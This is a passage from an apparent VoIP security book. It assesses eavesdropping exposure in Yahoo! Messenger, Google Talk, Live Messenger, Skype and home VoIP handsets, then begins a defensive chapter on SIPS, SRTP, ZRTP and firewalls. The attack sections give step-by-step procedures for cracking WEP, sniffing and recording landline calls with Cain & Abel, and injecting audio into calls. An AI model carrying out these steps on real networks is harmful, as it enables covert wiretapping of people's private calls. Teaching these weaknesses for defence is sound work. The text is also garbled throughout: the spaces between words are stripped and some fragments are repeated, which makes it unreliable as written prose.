Yahoo!MessengerisapopularinstantmessagingclientthatalsosupportsVoIPservicesusingSIPandRTP.WhileSIP/RTPcommunicationiswrappedwithTLSduringPC-to-PCcalls,RTP

trafficisnotprotectedbetweenPC-to-landlinecalls.DuringaPC-to-PCcall,Yahoo!MessengerwrapsalotofsessionandmediainformationintoTLS.AcertainamountofRTPjitterleaksthroughduringPC-to-PCcalls,butnovoice(audio)contentisactuallyextracted.Hence,authenticationattacksonPC-to-PCcallsarequitedifficultbecauseYahoo!Messenger'sauthenticationoccursduringtheSingleSign-On(SSO)processwiththeYahoo!portal.Hence,ifauserisloggingontohismail,hispictures,oraVoIPsession,authenticationwillbewrappedviaaTLStunnel.WhileadecentamountofprotectionisheldonPC-to-PCcalls,thesamecannotbesaidforPC-to-PSTNcalls,asdiscussedinthenextsection.

EavesdroppingonYahoo!Messenger

Yahoo!MessengeralsoallowscallstobemadetoregularPSTNlandlinesormobilephones.WhenauserwantstomakeacalltoaPSTNlineviaYahoo!Messenger,authenticationstilltakesplaceviathesoftware(becauseaccesstotheUItoplacelandlineormobilecallsisnotavailableuntiltheuserhassuccessfullyloggedin).Afterauthenticationoccurs,ausermaycallanyPSTNlineinsteadofaPCrunningMessengersoftware.AndunlikethePC-basedcalls,whenausercallsalandline,theRTPprotocolisusedoverthenetwork.SimilartotheattacksdiscussedintheRTPchapter,ananonymousattackercansnifftheconnectionbetweenthepersonusingYahoo!MessengerandhisoutboundPSTNcall.Oncetheusersniffstheinformation,theattackercaneavesdroponthecallorinjectRTPpacketsinthemiddleofthephoneconversation.SeeFigure8-16.

Figure8-16.EavesdroppingoncallsbetweenYahoo!Messengerandlandlinesormobilephones

Theonlycaveathereisthattheattackermusthavesoftwaresupportingthecodecusedduringthecall.Atthetimeofthispublication,Cain&AbelsupportssomeYahoo!MessengerRTPcodecs,butnotallofthem.InordertoeavesdroponacallbetweenaYahoo!MessengerclientandaPSTNline,anattackerwouldcompletethefollowingsteps.Resultsmayvarydependingonthecodecsupport.

1. Repeatsteps1through13from"CallEavesdropping(RTP)"onCallEavesdropping(RTP).

2. Onthebottomrow,selectVoIP.IfVoIPcommunicationhasoccurredonthenetworkusingRTPmediastreams,Cain&AbelwillautomaticallysavetheRTPpackets,reassemblethem,andsavethemto.wavformat.AsshowninFigure8-17,Cain&Abelhascapturedafewphoneconversationsoverthenetworkusingafewsimplesteps.

Figure8-17.CapturedVoIPcommunicationviaRTPpackets

Usingaman-in-the-middleattackandCain&Abel'sdefaultVoIPsniffer,whichcapturesRTPpackets,anattackercaneasilycaptureandrecordcallsbetweenYahoo!MessengerandthePSTNline.ThekeyideatokeepinmindhereisthattheaudiocodecusedduringthecallmustbesupportedbyCain&Abel.Ifthecodecisnotfullysupported,therecordedcallmaycaptureonlyonesideoftheaudio.Cain&Abelwillshowifthecodecisunsupportedbyindicating"IP1/IP2codecnotsupported"intheStatuscolumn.

InjectingAudiointoYahoo!MessengerCalls

SimilartotheRTPinjectionattackdiscussedinChapter4,Yahoo!MessengercallstoPSTNlinescanalsobeinjectedwithaudiofromananonymousattacker.TheinjectionattacksallowmaliciousentitiesonthenetworktoinjectaudiointoexistingcallsbyYahoo!users.Referto"VoiceInjection(RTP)"onVoiceInjection(RTP),whichshowsyouhowtoinjectaudiocontentintoVoIPcallsthatuseRTPformediatransfer.

GoogleTalk

GoogleTalkusesExtensibleMessagingandPresenceProtocol(XMPP)andXMPPExtensionProtocols(XEP)foritsvoiceservices.XMPPisanopenXMLprotocoldevelopedbythe

Jabberopensourcegroup.Google'sXMPPcommunicationusesTCPport5222,withalltrafficencryptedusingTLS.XMPPaloneoffersnoprotectionoftheclient'susernameorpassword,includedwithplainSASL(SimpleAuthenticationandSecurityLayer);however,GoogleTalkforcesauthenticationtotakeplacewithGoogle'sSingleSign-On(SSO)token,asnotedbythe"X-GOOGLE-TOKEN"mechanismshowninFigure8-18.TheSSOisconductedoverSSLbeforetheXMPPcommunicationprocessoccurs,whichprotectstheuser'scredentials.

Figure8-18.XMPPXML,displayingGoogleTalkauthenticationtoken

BecausetheSSOauthenticationprocesstakesplaceoverTLSandXMPPmediaarewrappedoverTLS,encryptionprotectstheusername,password,andmediawhiletheyareintransit.TheuseofTLSforauthenticationandmedia(audio)transferaddssignificantlytothesecurityofGoogleTalk;however,afewSSLattackscanstilltakeplace.Forexample,asignificantattackclassonTLS/SSListoperformaman-in-the-middleattackbetweentheenduserandtheserver.AnattackercanplaceherselfinthemiddleofaclientandaserverbyattackingARP,CAMtables,orDHCPandintercepttheSSLcertificatewhentheSSLhandshakeisattempted.DuringtheSSLhandshake,theattackerwillneedtoenticeausertoacceptherfakeTLScertificate.Becausetheattackerholdsallprivatekeysofherfakecertificate,iftheuseracceptsthefakecertificate,theattackercandecrypttheTLSinformationandviewitscontents.ThebesttoolforperformingSSLman-in-the-middleattacksis

Cain&Abel.However,GoogleTalkpreventsthisattackfromhappeningwithstrongSSLsecurityprotections.IfaGoogleTalkclient,oranyGoogleclientusingitsSSOauthentication,seesafake,unsigned,orself-signedcertificateduringtheSSLhandshake,itautomaticallyfailsanddoesnotallowthehandshaketooccur.Itdoesnotevengivetheuseranoptionforaninsecurehandshake,asshowninFigure8-19.

Figure8-19.FailedSSLman-in-the-middleattack

NotethatthisisnotsomuchanattackonTLS/SSLbutratherasocialengineeringattacktogetausertoacceptafakeTLS/SSLcertificate.Hence,whileXMPPislargelyacleartextprotocol,withGoogle'sSSOrequirementtouseTLSwithGoogleTalkmedia,allpasswordinformationandmedia(audio)areencryptedoverthewire.Atthetimeofthispublication,GooglehasopenlydiscussedsupportforSIPinthefuture.IfSIPissupportedbyGoogleTalkwithouttheuseofSSL,alltheauthenticationattacksdiscussedintheSIPchapterwillalsoapplytoGoogleTalk(ortoanyVoIPclientusingSIP).

MicrosoftLiveMessenger

MicrosoftLiveMessenger,anotherpopularinstantmessagingclient,alsosupportsVoIPservicesusingSIPandRTP.SimilartoYahoo!Messenger,Microsoftwrapsallsessionsetupandmedia(audio)transferonpeer-to-peervoicecallswithTLS.AlthoughtherehasbeenmuchdiscussionaboutMicrosoft'sinsecureVoIPcommunication,atthetimeofthispublication,communicationoccursviaanencryptedTLStunnelonPC-to-PCcalls.SimilartoYahoo!MessengerandGoogleTalk,theauthenticationprocessofLiveMessengerusesMicrosoft's.NETSSOcookieoverTLS.BecauseTLSprotectstheSSOcookieandthemedia(audio)communication,eavesdroppingorinjectingcontentduringPC-to-PCcallsonWindowsLiveMessengerisnotpossibleusingtypicalmethods.IfanSSLman-in-the-middleattackisattempted,asdiscussedpreviously,LiveMessengerwillalsofailbynotallowingafake,unsigned,orself-signedcertificateduringtheSSLhandshake,asshowninFigure8-20.

Figure8-20.FailedSSLman-in-the-middleattackunderLiveMessenger

UnlikeGoogleTalk,MicrosoftLiveMessengerprovidestheabilitytomakecallstoregularPSTNlandlines.ThePSTNcallsareprovidedbyVerizon,allowingMicrosofttousetheVerizonnetworktomakecallsoutsideofPC-basedclients.WhenauserwantstomakeancalltoalandlineviaLiveMessenger,authenticationstilltakesplaceviatheSSOcookie(becauseaccesstotheUItoplacelandlinecallsisnotavailableuntiltheuserhassuccessfullyloggedin).

Skype

Skypeisaclosed,non–standards-basedVoIPclient.UnlikeallotherPC-basedVoIPsoftwaredescribedinthischapter,Skypeusesacompletelyproprietaryformatforsessionsetupandmediatransfer.ThismeansthatSkypedoesnotusetraditionalVoIPprotocols,suchasSIP,H.323,RTP,orXMPP,butratheritsownhome-grownVoIPimplementation.Sinceitsinception,SkypehasprobablybeenthemostpopularPC-basedVoIPclient,withmorethan7millionregisteredusers.Inturn,becauseofitspopularityandclosednature,SkypeisprobablythemostcuriousVoIPclientfromasecurityperspective.WhiletherehavebeenmanydocumentedbufferoverflowsagainstSkype,therehavenotbeenanypublishedreportsofSkypedatacommunicationsbeinginsecure.Nevertheless,withaclosedsystem,thereisalsonowayforsubscriberstoverifywheretheirpacketsmayormaynotbegoingandwhomayhaveaccesstothedecryptedinformation.Thisisoneofthebiggestissuesusershavewiththesoftware.TherehavebeenindependentreportswrittenaboutSkype'sencryptionmethods,whichcanbefoundathttp://www.skype.com/security/files/2005-031%20security%20evaluation.pdf/.InadditiontothepaidwhitepaperbySkype,ateamofresearchershasreleasedawhitepaperonreverseengineeringSkype,whichcanbefoundathttp://www.secdev.org/conf/skype_BHEU06.pdf/.

SOHOPhoneSolutionsTheemerginguseofsoftware-basedVoIPclientshaschangedhowpeoplemaketelephonecalls;however,themajorityofcallsplacedviaSkype,Yahoo!,Microsoft,orGooglearelargelyduetoconvenienceorcost,andtheVoIPsolutionusedisnotthedefaultphonesysteminahousehold.Therearemanyreasonsforthis,includingreliability,callquality,andmobility.Mobilityofsoftware-basedVoIPclientsisanissuebecauseusersneedtobenearorontheircomputerstoplaceaVoIPcall.Nomatterhowcheapthesolution,averagehomeusersdonotwanttospendalltheirtalktimeinthecomputerroom.Recognizingthelimitedmobilityofsoftware-basedVoIPclients,smalloffice/homeoffice(SOHO)manufacturershavebeguntocreatehandsetsthataresimilartoaregularcordlesshomephonesbutwhichoperatethroughasoftware-basedVoIPclientthatconnectstothecomputer.ThissectionbrieflyreviewsthesecurityconcernswhenusingthehybridPC/hardphonesolutions.Thesecurityimplicationsarenodifferentfromthosedescribedpreviouslyifinsecureprotocols,suchasSIPandRTP,areused,buttheattackperspectiveprocessisslightlychanged.ManySOHOmanufacturers,suchasLinksys,Netgear,andD-Link,arecreatingproductsthatintegratehandsetswithYahoo!Messenger,WindowsLiveMessenger,orGoogleTalk.TheseproductsallowuserstoplaceregularPSTNcallsviathehandsetaswellasYahoo!orMicrosoft'svoiceservicesviaVoIP.Forexample,userscansignintotheYahoo!Messengeraccountfromthehandsetitselfandplaceacalltoafavoritecontact.TheimplementationdesignforthesolutionisthesameastheoneshowninFigure8-16onEavesdroppingonYahoo!Messenger.Inorderforthedesigntowork,theSOHOhandsetmustbeconnectedwithaUSBcabletoaPCwithYahoo!Messengerinstalled.ThehandsetconnectstotheYahoo!Messenger

softwareonthePC,whichthenmakestheoutboundcalltoanotherYahoo!Messengeruser,amobilephone,orlandline,allviatheInternet.AuserwhowishestomaketraditionalPSTNcallswithoutYahoo!Messengerbutthroughthelocalphonecompanyshouldplugthebasestationofthehandsetintoatelephonejack.ThesecurityimplicationsoftheSOHOsolutionscanbewideornarrowdependingonthelocationandusage.Forexample,ahomeuserwithYahoo!MessengeronhisPCisexposedtothesameattacksurfaceasauserwiththeSOHOhandset,whichisunauthorizednetworkeavesdroppingonthecurrentnetworkorupstreamontheISP.TheuseofaSOHOhandsetbyauserallowsanattackertostillsniffalltheRTPpacketswhenuserscalllandlinesorcellphones.Thisisalsotrueforthesoftwaresolution.AfewareasofexposuretodiscusswiththehandsetsolutionaretheuseofhomeVoIPsolutionswithinsecurewirelessnetworks.AproblematicsetupisshowninFigure8-21.

Figure8-21.SOHOVoIPNetwork

Figure8-21showsasolutionunderwhichahomeusermaybeconnectedtotheInternetusingawirelessaccesspoint/switch.IfthehomeuserhasnotsecuredherwirelessaccesspointorusesWEP,anattackercanjointhewirelessnetworkandsnifftheuser'scommunication,includingherYahoo!MessengerVoIPcalls.ManyaccesspointssupportWPA,astrongersecuritymethodforhomewirelessdevices,butagreatdealofwirelessaccesspointsstilluseWEP,whichisnotagoodsecurityencryptionmethod.Anexternalattacker,asshowninthebottomofFigure8-21,canperformthefollowingstepstoeavesdroponorinjectcontentintoauser'shomephonecommunication:

1. LocatetheWirelessnetwork.2. IfWEPisenabled,usetoolslikeKismet,Aircrack,andCain

&AbeltoobtaintheWEPkey.3. Onceonthewirelessnetwork,useCain&Abel,asshown

in"VoiceInjection(RTP)"onVoiceInjection(RTP),toeavesdropfromYahoo!MessengertoaPSTNline.

4. Onceonthewirelessnetwork,useRTPInject,asshownin"VoiceInjection(RTP)"onVoiceInjection(RTP),toinjectaudiointoRTPpacketsfromYahoo!MessengertoaPSTNline.

Alternatively,ifnowirelessnetworkisused,externalexposuresarelimitedtoattackingtheISP'snetwork.Forexample,ifanattackerperformedaman-in-the-middleattackonherpubliclyfacingnetworksubnet,allpacketswouldarriveonhermachineinsteadofontheISP'supstreamrouter.IfanyofthesepacketscontainedRTPpackets,theattackercouldeavesdroporinjectasshewishes.Intheexample,performingatargetedattackisharderastwoneighborswiththesameISPcouldbeonentirelydifferentsubnets.BecausemosthomeshavewirelessaccesspointswithorwithoutWEP,attackingthewirelessnetworkisprobablythebestattacksurface.

Itshouldbenotedthatinternalattacksonthewirednetworkswitch/hubwouldwork,regardlessofwhetherYahoo!MessengeronaPCoraLinksysdeviceisbeingused.AninternalattackerwouldneedonlytoconnecttothenetworkswitchshowninFigure8-21anduseCain&AbelorRTPInjecttoperformtheattackshewantstocarryout.Hence,ifahostilefamilymemberorroommatewishestorecordallcallsorinjectcontent,anycallsfromthehandhelddeviceofPCsoftwaretoaPSTNlinearevulnerable.

SummaryAfewhomeVoIPsolutionshaveroomforimprovementwhenitcomestosecurity,whileothersareprettydecent.BecausemanyofthesolutionsuseexistingVoIPprotocols,suchasSIPandRTP,allofthemwillalsoinherittheirsecurityexposures.Forexample,ifRTPisusedwithYahoo!Messenger,Ciscohardphones,orVonage,itssecurityexposureswillaffectallproductsthatuseit.CommercialVoIPsolutions,suchasVonage,havelittlesecuritybuiltintothem.Itemslikeencryptionaretotallyabsent,whichmaybeasurprisetomostcustomers.Furthermore,whilePSTNlandlinesmightbeasvulnerableasVonage,IP/Ethernetisamuchlargerattacksurfacegiventhatanyoneinyourhomeoronyourwirelessnetworkcanlistentocalls.Inaddition,PC-basedVoIPsolutionshavehadsomepositiveandnegativeresults.AllPC-basedsolutionsthatuseSSOforauthenticationareusingSSL,ensuringthattheauthenticationinformationisprotected.Also,theexposureonthePC-basedsolutionswaslimitedtooutboundPSTNcalls,asPC-to-PCcallswerewrappedwithencryption.Finally,SOHOsolutionswerenodifferentfromthePCsolution,exposingcallstolandlinesbutnotcallstoPCs.HomeVoIPsolutionsaredividedbetweenPC-to-PCcallsandPC-to-landline(orPC-to–hardphone)calls.WhenoneismakingPC-to-PC–basedVoIPcalls,SSLcanbeusedtoencryptthecommunication.Whencallsaremadetoalandlineortoahardphone,thingsbecomemoredifficult.PC-to-landlinecallsusedifferentprotocolsthatoftenlackthesecurityprotectionsavailableinPC-to-PCcalls.

PartIII.ASSESSANDSECUREVOIP

Chapter9.SECURINGVOIPSecuringVoIPisanimportanttaskifyouaregoingtoprotectinformation.Whileorganizationsoftenthinkofsecurityintermsoffoldersandfiles,informationspokenovervoicecanbejustasimportant.Forexample,thinkofhowmanytimespeoplegivetheircreditcardnumber,mother'smaidenname,oreventheirsocialsecuritynumberoverthephone.WhatifthecustomerservicerepresentativeontheotherendisusingaVoIPphone?IfthemedialayerusesRTP,anattackercancapturethepacketsandgainaccesstoallthesensitiveinformation.Thelackofsecurityofvoiceconversations,outlinedinthefirsteightchapters,showstheneedforsecureVoIPnetworks.ManyorganizationsliketosaythatVoIPnetworksareonlyusedinternally,sosecurityisnotahugeconcern.Unfortunately,theseorganizationsareessentiallysayingthateveryphonecall,fromtheCEO'stotheintern's,shouldbesharedwitheveryoneinthecompany,bothprofessionalcallsandpersonalcalls.Weallknowthestatementisnottrue,butwhysuchresistancetosecuringVoIP?ThereasonisthatsecuringVoIPinthepropermannerisnoteasyorcheap.Itcanbeacumbersomeprocessthatinvolvesnewhardwareandmoredollars.IfsecuritywerejustacheckboxonVoIPproducts,itwouldbeeverywhere.Vendorsinitiallyhavenotincorporatedeasy,safe,andinteroperablesecurityfeaturesintotheirproducts,andasaresulttheVoIPconsumershavesuffered.ThischapterwillbeginthediscussiononhowtosecureaVoIPnetworkfromthemanyattackscoveredinthisbook.Specifically,thefollowingareaswillbediscussed:

SIPoverSSL/TLS(SIPS)SecureRTP(SRTP)ZRTPandZfoneFirewallsandSessionBorderControllers

SIPoverSSL/TLSSIPoverSSL/TLS(SIPS;specificallySSLv3orTLSv1),whichusesTCPport5061,isamethodforsecuringSIPsessioninformationfromanonymouseavesdroppers.

Note✎

PreviousversionsofSSL,suchasSSLv2,shouldnotbeusedduetoknownweaknessesintheimplementation.

AsdiscussedinChapter2,SIPisacleartextprotocolthatcanbemanipulatedandmonitoredbypassiveattackersonthenetwork.Furthermore,theauthenticationmethodusedbySIPisdigestauthentication,whichisvulnerabletoanofflinedictionaryattack.Anofflinedictionaryattackbyitselfisaconcern;however,combinedwiththefactthatmostSIPUserAgentsusefour-digitcodesforpasswords(usuallythelastfourdigitsofthephone'sextension),thismakesSIPauthenticationveryvulnerabletoattackers.Tohelpmitigatetheauthenticationissue,aswellasmanyotherissueswithSIP,SIPS(SIPoverSSL/TLS)canencryptthesessionprotocolfromaSIPUserAgenttoaSIPProxyserver.Furthermore,theSIPProxyservercanalsouseTLSwiththenexthop,ensuringthateachhopisencryptedend-to-end.UsingTLSwithSIPissimilartousingTLSwithHTTP.Thereisarequiredcertificateexchangeprocessbetweentwoentitiesaswellassessionkeysthatmustbeused.TheprimarydifferencebetweenHTTPandSIPistheuseofabrowserversusahardorsoftphone.BothcliententitiesneedtohavesupportforTLSwithsometypeofembeddedTLSclientandacertificatechainprocess.Thefollowingstepsshowahigh-levelexampleoftheSIPSprocess:

1. TheSIPUserAgentcontactstheSIPProxyserverforaTLSsession.

2. TheSIPProxyserverrespondswithapubliccertificate.3. TheSIPUserAgentvalidatesthepubliccertificatefromthe

Proxyserverusingitsrootchain(similartotherootchainthatInternetbrowserscontain).

4. TheSIPUserAgentandtheSIPProxyserverexchangesessionkeystoencryptanddecryptinformationforthesession.

5. TheSIPProxyservercontactsthenexthop,suchastheremoteSIPProxyserverornextUserAgent,andnegotiatesaTLSsessionwiththatendpoint.SeeFigure9-1.

Figure9-1.High-levelTLScommunicationfromahardphonetoaSIPProxy

NowthatweknowthegeneralmethodforusingTLSonSIP,thenextstepistoimplementTLS.ImplementationisnotquiteasstandardasHTTPis,becausemostpeopleuseonlyafewbrowsersandwebservers.IntheVoIPworld,thereareseveralvendorsofhardandsoftphonesaswellasdifferenttypesofSIPProxyserverssupportingSIPS.Hence,dependingontheimplementationoftheVoIPnetwork,thereareafewwaystoimplementTLSonSIPphones.ThefollowingareURLsforsomepopularplatforms:

OpenSerTLSImplementationSteps,http://confluence.terena.org:8080/display/IPTelCB/3.5.2.+TLS+for+OpenSER+(UA-Proxy)/

CiscoTLSImplementationSteps,http://www.cisco.com/en/US/docs/ios/12_3/vvf_c/cisco_ios_sip_high_availability_application_guide/hachap2.html#wp1136622/AvayaTLSImplementationSteps,http://support.avaya.com/elmodocs2/sip/S6200SesSip.pdf/

SecureRTPSecureRTP(SRTP),asdefinedbyRFC3711,isaprotocolthataddsencryption,confidentiality,andintegritytotheactualvoicepartofVoIPcallsthatuseRTPandRTCP(RealTimeControlProtocol).Aswesawintheprevioussection,wrappingSIPorH.323trafficoverTLSprotectstheauthenticationinformation;however,themoreimportantpartofthecallisprobablytheactualmediastreamthatcontainstheaudio.ASIPinfrastructureusingTLSwithacleartextRTPmediastreamstillallowsattackerstoeavesdroponorinjectaudiointocallsandacquireconfidentialinformation.SRTPworksbyencryptingtheRTPpayloadofapacket.TheRTPheaderinformationisnotencryptedbecausethereceivingendpoints,routers,andswitchesneedtoviewthatinformationinorderforthecommunicationpathtobecompleted.Thus,inordertoensureprotectionoftheheader,SRTPprovidesauthenticationandintegritycheckingfortheRTPheaderinformationwithanHMAC-SHA1function.It'simportanttonotethatSRTPdoesnotsupplyanyadditionalencryptionheaders,makingitlookverysimilartoRTPpacketsonthewire.ThisallowsQoSfeaturestoremainunaffected.ThefollowingsectionsbrieflydescribethesefunctionsofRTP:

SRTPandMediaProtectionwithAESCipherSRTPandAuthenticationandIntegrityProtectionwithHMAC-SHA1SRTPKeyDistributionMethod

SRTPandMediaProtectionwithAESCipher

SRTPutilizestheAdvancedEncryptionStandard(AES)asthecipherforencryption,whichcanbeusedwithtwociphermodes.ThetwociphermodesthatcanbeusedwithAESareSegmentedIntegerCounterMode(SICM),whichisthedefault,andf8mode.Athirdcipher,whichistheNULLcipher,canalso

andf8mode.Athirdcipher,whichistheNULLcipher,canalsobeusedwithAES,butitnevershouldbeimplementedasitwouldprovidenoencryptiontothemediastream.

Note✎

BeforeAESwasstandardwithRTP,Avayacreatedanalternative,whichiscalledAvayaEncryptionAlgorithm.Ingeneral,usingproprietaryencryptionisnotrecommendedforsecurityorinteroperabilityreasons.

SRTPandAuthenticationandIntegrityProtectionwithHMAC-SHA1

InadditiontoAES,whichprovidesencryptiontothepayload,SRTPcanprovidemessageintegritytotheheaderpartofthepacketwithHMAC-SHA1.HMAC(keyed–HashMessageAuthenticationCode)isacryptographichashfunctiontoverifysimultaneouslyboththedataintegrityandtheauthenticityofamessage.HMACsareoftenusedwiththeSHA-1hashfunction,deemedasHMAC-SHA1.Underthistechnique,anHMAC-SHA1hashwillbetaggedontotheendofapackettoprovideintegritybetweentwoVoIPendpoints.TheintegrityadditionwillensurethatVoIPpacketsarenotsusceptibletoreplayattack,whichcanstilloccurevenwithAESencryptionofthemediastream.Figure9-2showsthestructureofanRTPpacketusingSRTPforauthenticationandencryption.

Figure9-2.SRTPpacketexample

ThefollowingstepsprovideanexampleofhowSRTPcanbeusedbetweentwoendpoints.Inthisexample,endpointsSoniaandKusumwishtocommunicateviaSRTPusingencryptionforthepayloadandauthenticationfortheheaderintheRTPpacket.

1. Soniarequeststhesessionkeysfromthemediatingdevice,suchasAsterisk,CiscoCallManager,orAvayaCallCenter/Server.

2. Themediatingdevice,whichhasthemasterkey,openstwosessionseachwithSoniaandKusum.Thetwosessionsareforeachdirectionofthemediastream.

3. Duringthekeynegotiationphase,themasterkeyispassedintheheaderofthesessionsetupprotocol,suchasSIPorH.323.TheactualsessionkeysarethengeneratedusingAESontheclients.Afterreceivingthemasterkey,SoniaandKusumcreatetheirsessionkeysforthecommunication.

4. AfterbothSoniaandKusumhavecreatedthesessionkeys,theSRTPcommunicationcanoccur.

DependingontheimplementationoftheVoIPnetwork,thereareafewwaystoimplementSRTPbetweenVoIPdevices.HerearetheURLsforsomepopularplatforms:

AsteriskSRTPImplementationSteps,http://www.voip-info.org/wiki/view/Asterisk+SRTP/CiscoSRTPImplementationSteps,http://www.cisco.com/en/US/products/sw/voicesw/ps556/products_administration_guide_chapter09186a00803fe693.html#wp1033627/AvayaSRTPImplementationSteps,http://www.avaya.com/master-usa/en-us/resource/assets/applicationnotes/srtp-iptrunk.pdf/libSRTP,anopensourcelibraryforSRTP,

http://srtp.sourceforge.net/srtp.html/

SRTPKeyDistributionMethod

Onemajor"gotcha"forSRTPisifthekeyexchangeprocessoccursovercleartext,whichcanhappenifaVoIPinfrastructureisusingSIPorH.323withoutaTLStunnel.Thus,theSRTPmasterkeycanbecapturedfromcleartextSIPorH.323packets,andanattackercoulddecryptanyencryptedSRTPpacketscapturedoverthewire.IfSRTPisbeingusedforsecuritypurposes,ensurethatTLSisusedwithSIPorH.323;otherwise,thesecuritybenefitofSRTPisreduced.

ZRTPandZfoneZRTP,anextensionofRTP,appliesDiffie-Hellman(DH)keyagreementtoexistingSRTPpacketsbyprovidingkey-managementservicesduringthesetupprocessofaVoIPcallbetweentwoendpoints.Itstaysfarawayfromthesessionlayer,suchasSIPandH.323,andfocusessolelyonSRTP.ZRTPcreatesasharedsecretthatisusedtogeneratekeysandasaltforSRTPsessions.OneofthenicethingsabouttheprotocolisthatitdoesnotrequirepriorsharedsecretsoraPublicKeyInfrastructure(PKI)tobeinplace.ZRTPissimilartoPGP(PrettyGoodPrivacy)asittriestoensurethatman-in-the-middleattacksdonotoccurbetweentwoendpoints.Inordertosolvetheseissues,itusesaShortAuthenticationString(SAS),whichisahashvalueoftheDHkeys.TheSAShashiscommunicatedtobothVoIPendpointsusingZRTP.EachendpointverifiestheSASvaluetoensurethatthehashesmatchandthatnotamperinghastakenplace.ImplementationofZRTPisfoundinZfone,aVoIPclientthatusesZRTPforsecuremediacommunication.Zfonecanbeusedwithanysessionsetupprotocol,suchasSIPorH.323,aslongasRTPisusedforthemedialayer.Furthermore,Zfonecanbeusedwithanyexistingsoftware-basedVoIPclientthatdoesnotusemediaencryption.Inafewcases,ZfonemayalreadybeintegratedwithintheVoIPclient,althoughtheauthorhasnotseenanyintegratedimplementationsyet.InorderforZfonetoencryptVoIPcommunicationusingRTP,itwatchestheprotocolstackonanoperatingsystemandinterceptsallVoIPcommunication.OncetheVoIPcommunicationhasbeenintercepted,ZfoneencryptsitbeforeitproceedsanyfurtherintotheOS.Forexample,ifanon-SRTPornon-ZRTPclientismakingaVoIPcall,Zfonedetectsthatthecallbeganbywatchingthenetworkcommunicationtoandfromthemachine.Ittheninitiatesakeyagreementbetweenthelocalclientandtheremoteclient.Afterthekeyagreementhasbeencompleted,

remoteclient.Afterthekeyagreementhasbeencompleted,ZfonethenencryptsalltheRTPpacketsoverthewirebetweenthesourceandthedestination(Zfonemustbeinstalledonbothsides,thesenderandthedestination).CompletethefollowingexercisetouseZfonebetweentwoVoIPclientsthatdonotnativelysupportmediaencryption.You'llneedthefollowing:X-LiteVoIPsoftphonefromhttp://www.counterpath.com/index.php?menu=Products&smenu=xlite/,Zfonefromhttp://www.zfoneproject.com/,andalocallyadministeredAsteriskserver:

1. LogintotheAsteriskserver.2. ChangedirectoriestotheAsteriskfolderwiththefollowing

command:cd/etc/asterisk.3. Openthesip.conffilein/etc/asteriskandaddthefollowing

itemsattheendofthefile:[Sonia]type=friendusername=Soniahost=dynamicsecret=123voiptestcontext=test[Raina]type=friendusername=Rainahost=dynamicsecret=123voiptestcontext=test

4. Opentheextensions.conffilein/etc/asteriskandaddthefollowingitemsinthe[test]realm:

[test]exten=>100,Dial,(SIP/Sonia)exten=>101,Dial,(SIP/Raina)

5. InstallX-LiteontwoPCs.InordertodirecttheVoIPsoftphonetoyourAsteriskserver,configureX-Liteusingthefollowingsteps:

a. Selectthedownarrowdrop-downbox.b. NavigatetoSIPAccountSettings.c. SelectProperties.d. SelecttheAccounttabandenterthefollowing:

Username:Username(SoniaorRaina)Password:123voiptestDomain:IPaddressofAsteriskServer

e. SelectOKandClose.6. Download(fromhttp://www.zfoneproject.com/),install,and

enableZfoneonbothPCs.7. OnceX-LitehasbeenconfiguredandZfonehasbeen

enabled,useonePCtocalltheotherX-Liteclientatextension100.

8. OnceX-Litehasmadethecall,ZfonewillinterceptthecommunicationandencryptthemediausingZRTP.Ifthecallissecure,ZfonewillshowSecureingreenasshowninFigure9-3.Ifthecallisnotsecure,ZfonewillshowNotSecureinredasshowninFigure9-4.

Figure9-3.ZfoneSecureusagewithX-Litesoftphone

Figure9-4.ZfoneNotSecureusagewithX-Litesoftphone

FirewallsandSessionBorderControllersToputitmildly,firewallsandVoIPnetworksarenotbestfriends.TherelationshipstartedoutbadlywhenVoIPaskedFirewalltoallowallUDPportsgreaterthan1024through,asifitwereanormalrequest.Firewallwasgreatlyoffended,andthetwohavenottalkedmuchsincethen.

TheVoIPandFirewallProblem

WhilerecentchangestoVoIPdeviceshavereducedthenumberofportsneeded,severalVoIPnetworksstillusealotofportsonthenetwork,wheremanyofthemarenotstatic.Forexample,thefollowinglistshowsthepossibleportsthatmaybeusedinaVoIPnetwork:

SIP

TCP/UDP5060TCP/UDP5061

IAX

TCP/UDP4569RTP

UDP1024-65535(audio/video)UDP1024-65535(control)

H.323

TCP/UDP1718(Discovery)TCP/UDP1719(RAS)TCP/UDP1720(H.323setup)TCP/UDP1731(AudioControl)TCP/UDP1024-65536(H.245)

Thelistdoesnotlooktoobadatfirst,butwhendynamicportsareusedwithRTP,thelistbecomesquitelarge.BecausebothSIPandH.323useRTPformediatransfer,bothofthemajorsessionsetupprotocolsareaburdenforfirewalls.BecauseRTPusesadynamicsetofportsbydefault,itlimitsthefirewall'sabilitytopinpointtheexactportorportsthatneedtobeopened.Anotherissue,besidesopeningalotofportsthroughthefirewall,isNetworkAddressTranslation(NAT).NATedendpointstryingtoreachexternalentitiescanhaveproblemsbecauseRTPportsuseUDPwiththerealsourceanddestinationvaluesinsidethepayload.Thislimitstheabilityofastandardfirewalltoseethecorrectendpoint.ThisbehaviorallowsVoIPsessionstobesetupwithSIPorH.323,butRTPhasadifficulttimefindingitsdestination.Figure9-5showsanexampleoftheseissues.

Figure9-5.DynamicRTPportsandfirewalls

TheSolution

PlentyofsolutionshaveaddressedtheissueswithdynamicportsandNAT,includingtheuseofstaticportsforRTPmedia,firewallsthatareVoIP-aware,andtheuseofSessionBorderControllersandgatekeepers.MostVoIPvendorsnowsupporttheuseofstaticmediaportsforcommunication.Forexample,theRTPmediastreambetweentwoentitiescanbelimitedtoaportortwo,drasticallyreducingtheamountofportsopenedinthefirewallforRTPstreams.ThisallowsVoIPendpointstomakeoutboundcallswithSIPorH.323andallowsthemediaportstobeopenedonthefirewall.Whilethereisnoindustrystandardforstaticmediaports,manyorganizationsandvendorschooseastatic

